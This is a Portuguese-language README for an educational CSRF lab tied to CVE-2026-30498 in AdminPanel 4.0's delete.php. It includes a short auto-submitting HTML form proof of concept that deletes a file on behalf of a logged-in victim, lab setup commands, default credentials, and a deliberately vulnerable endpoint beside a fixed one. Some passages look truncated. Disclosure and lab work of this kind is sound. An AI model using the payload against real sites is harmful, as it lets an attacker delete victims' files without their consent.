
Demonstração educacional de vulnerabilidade CSRF com um ambiente de laboratório controlado, incluindo uma prova de conceito de exploração e uma versão corrigida com proteções CSRF adequadas.
ID CVE: CVE-2026-30498 (Reservado pela MITRE)
Descobridor: Mehdi Ben Hamou
Existe uma vulnerabilidade de Cross-Site Request Forgery (CSRF) no endpoint delete.php do AdminPanel 4.0.
Esta vulnerabilidade permite que um atacante acione ações sensíveis (exclusão de arquivos) em nome de um usuário autenticado sem o seu consentimento.
A vulnerabilidade é causada pela ausência de proteções CSRF:
O endpoint vulnerável processa requisições diretamente com base na sessão do usuário, sem validar a origem da requisição.
A exploração bem-sucedida leva a:
verifyPanel.phpUm atacante hospeda uma página web maliciosa que envia uma requisição forjada:
http://localhost:8080/delete.php?file=verifyPanel.php
Quando uma vítima (usuário autenticado) visita esta página, o navegador inclui automaticamente os cookies de sessão, e a requisição é executada.
<form id="csrfForm" action="http://localhost:8080/delete.php" method="GET">
<input type="hidden" name="file" value="verifyPanel.php">
</form>
<script>
document.getElementById("csrfForm").submit();
</script>
Esta requisição é enviada automaticamente com o cookie de sessão da vítima.
php -S localhost:8080
http://localhost:8080
admin / admin123
http://localhost:8081/evil.html
/panel/dashboard.php
Este repositório inclui um ambiente de laboratório controlado para reproduzir a vulnerabilidade com segurança.
Importante: Este laboratório é uma simulação e não representa o código-fonte original exato do AdminPanel.
Para redefinir o ambiente:
/reset.php
Uma versão segura é implementada em:
delete_fixed.php
Proteções adicionadas:
victim/
├── index.php
├── delete.php
├── delete_fixed.php
├── reset.php
└── panel/
└── dashboard.php
attacker/
└── evil.html
Este projeto destina-se apenas a fins educacionais e de pesquisa.
Não utilize esta vulnerabilidade em sistemas sem autorização adequada.